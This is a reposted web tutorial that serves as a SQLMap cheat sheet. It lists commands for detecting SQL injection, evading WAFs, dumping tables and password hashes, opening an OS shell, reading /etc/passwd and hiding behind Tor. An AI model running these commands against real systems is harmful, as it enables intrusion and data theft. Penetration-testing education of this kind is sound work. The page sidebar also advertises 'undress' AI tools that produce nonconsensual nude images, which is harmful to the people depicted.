Backend Development
Python Tutorial
SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection
SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection
Author: Trix Cyrus
What is SQLMap?
SQLMap is an open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It supports various database systems like MySQL, PostgreSQL, Oracle, Microsoft SQL Server, and more.
Basic Usage
To start with SQLMap, you can run it in its simplest form by providing the target URL:
sqlmap -u "http://example.com/index.php?id=1"
This command scans the target URL for SQL injection vulnerabilities.
1. Detecting Vulnerabilities
Use the following options to perform a basic vulnerability scan and automatically detect SQL injection points:
sqlmap -u "http://example.com/index.php?id=1" --dbs
--dbs: Lists all available databases on the target server if a vulnerability is found.
2. Specifying POST Requests
For targets that require a POST request (usually in login forms), you can specify the data like this:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
3. Bypassing WAFs and Filters
To evade Web Application Firewalls (WAFs), SQLMap includes payload obfuscation techniques:
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
--tamper: Uses tamper scripts to evade filters. Example: space2comment, charencode.
4. Extracting Databases, Tables, and Columns
To get a list of databases on the target system:
sqlmap -u "http://example.com/index.php?id=1" --dbs
Once a database is identified, extract its tables:
sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
To get columns from a specific table:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
5. Dumping Data
Dumping the contents of a table is one of the most useful features of SQLMap. For example, to dump all data from a specific table:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
6. Enumerating Database Users and Passwords
SQLMap can also be used to enumerate database users and even crack hashed passwords:
sqlmap -u "http://example.com/index.php?id=1" --users sqlmap -u "http://example.com/index.php?id=1" --passwords
7. Accessing the Operating System
In some cases, SQLMap can be used to execute commands on the operating system, especially when the database user has high-level privileges:
sqlmap -u "http://example.com/index.php?id=1" --os-shell
This will provide an interactive shell where you can execute commands on the target system.
8. File Upload and Reading
You can also read files from the target system or upload malicious files (if permitted):
sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd" sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
9. Using Tor for Anonymity
To hide your identity, you can run SQLMap through the Tor network:
sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
--tor: Enables Tor.
--check-tor: Verifies if the connection is made through Tor.
10. Saving and Resuming Sessions
SQLMap allows you to save and resume your progress by using the --session option:
sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
Later, you can resume the same session by:
sqlmap -r your_session_name
11. Verbose Mode
To see detailed information about what SQLMap is doing:
sqlmap -u "http://example.com/index.php?id=1" -v 3
The -v option controls verbosity (levels from 0 to 6, where 6 shows all details).
- Automated Scans for Multiple Targets
SQLMap supports scanning multiple URLs stored in a file:
sqlmap -m urls.txt --batch
--batch: Automatically answer all prompts with default options, useful for automated scanning.
also use --risk=3 and --level=5 to advance scanning
You can use this cheat sheet to introduce readers to the essential commands of SQLMap and help them get started with SQL injection testing.
~TrixSec
The above is the detailed content of SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1662
14
1418
52
1311
25
1261
29
1234
24
Python vs. C : Applications and Use Cases Compared
Apr 12, 2025 am 12:01 AM
Python is suitable for data science, web development and automation tasks, while C is suitable for system programming, game development and embedded systems. Python is known for its simplicity and powerful ecosystem, while C is known for its high performance and underlying control capabilities.
Python: Games, GUIs, and More
Apr 13, 2025 am 12:14 AM
Python excels in gaming and GUI development. 1) Game development uses Pygame, providing drawing, audio and other functions, which are suitable for creating 2D games. 2) GUI development can choose Tkinter or PyQt. Tkinter is simple and easy to use, PyQt has rich functions and is suitable for professional development.
The 2-Hour Python Plan: A Realistic Approach
Apr 11, 2025 am 12:04 AM
You can learn basic programming concepts and skills of Python within 2 hours. 1. Learn variables and data types, 2. Master control flow (conditional statements and loops), 3. Understand the definition and use of functions, 4. Quickly get started with Python programming through simple examples and code snippets.
How Much Python Can You Learn in 2 Hours?
Apr 09, 2025 pm 04:33 PM
You can learn the basics of Python within two hours. 1. Learn variables and data types, 2. Master control structures such as if statements and loops, 3. Understand the definition and use of functions. These will help you start writing simple Python programs.
Python vs. C : Learning Curves and Ease of Use
Apr 19, 2025 am 12:20 AM
Python is easier to learn and use, while C is more powerful but complex. 1. Python syntax is concise and suitable for beginners. Dynamic typing and automatic memory management make it easy to use, but may cause runtime errors. 2.C provides low-level control and advanced features, suitable for high-performance applications, but has a high learning threshold and requires manual memory and type safety management.
Python and Time: Making the Most of Your Study Time
Apr 14, 2025 am 12:02 AM
To maximize the efficiency of learning Python in a limited time, you can use Python's datetime, time, and schedule modules. 1. The datetime module is used to record and plan learning time. 2. The time module helps to set study and rest time. 3. The schedule module automatically arranges weekly learning tasks.
Python: Exploring Its Primary Applications
Apr 10, 2025 am 09:41 AM
Python is widely used in the fields of web development, data science, machine learning, automation and scripting. 1) In web development, Django and Flask frameworks simplify the development process. 2) In the fields of data science and machine learning, NumPy, Pandas, Scikit-learn and TensorFlow libraries provide strong support. 3) In terms of automation and scripting, Python is suitable for tasks such as automated testing and system management.
Python: Automation, Scripting, and Task Management
Apr 16, 2025 am 12:14 AM
Python excels in automation, scripting, and task management. 1) Automation: File backup is realized through standard libraries such as os and shutil. 2) Script writing: Use the psutil library to monitor system resources. 3) Task management: Use the schedule library to schedule tasks. Python's ease of use and rich library support makes it the preferred tool in these areas.
